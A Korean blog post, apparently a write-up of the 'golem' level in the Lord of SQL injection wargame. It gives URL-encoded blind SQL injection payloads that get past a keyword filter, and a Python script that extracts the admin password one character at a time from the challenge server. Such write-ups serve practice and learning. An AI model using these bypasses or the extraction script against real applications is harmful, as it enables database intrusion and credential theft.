소스코드 분석
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe");
( ) or and substr 을 사용못하게 해놨다.
$query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'";
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem");
admin의 pw를 찾는 Blind sql injection 문제이다.
( -> %28, ) -> %29, or -> ||, and -> &&, substr -> substring
?pw=' || length%28pw%29like 8 %26%26 id like 'admin
pw=' || length%28pw%29like 8 %26%26 id like 'admin
?pw=%27%20||%20substring%28pw,1,1%29%20like%208%20%26%26%20id%20like%20%27admin
pw=%27 || substring%28pw,1,1%29 like 8 %26%26 id like 'admin
import http.client
result=''
leng=0
header={'Cookie':' '}
string="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"
for i in range(1,100) :
length='/golem_39f3348098ccda1e71a4650f40caa037.php?pw=%27%20||%20length%28pw%29%20like%20'+str(i)+'%20%26%26%20id%20like%20%27admin'
conn=http.client.HTTPConnection('los.eagle-jump.org')
conn.request('GET',length,'',header)
data=conn.getresponse().read()
if "Hello admin" in data.decode():
leng = i
print ("pw length: "+str(i))
break
for i in range(1,leng+1):
for j in range(0,76):
substr='/golem_39f3348098ccda1e71a4650f40caa037.php?pw=%27%20||%20substring%28pw,'+ str(i) +',1%29%20like%20'+'%27'+ str(string[j]) +'%27'+'%26%26%20id%20like%20%27admin'
conn=http.client.HTTPConnection('los.eagle-jump.org')
conn.request('GET',substr,'',header)
data=conn.getresponse().read()
if 'Hello admin' in data.decode():
result=result+string[j]
print ('substring(pw,'+str(i)+',1)= '+str(string[j]))
break
print ('Password is '+result)
'WarGame > Web' 카테고리의 다른 글
| [Lord of SQL injection] bugbear (0) | 2017.05.28 |
|---|---|
| [Lord of SQL injection] darkknight (0) | 2017.05.28 |
| [Lord of SQL injection] skeleton (0) | 2017.05.25 |
| [Lord of SQL injection] vampire (0) | 2017.05.25 |
| [Lord of SQL injection] troll (0) | 2017.05.25 |
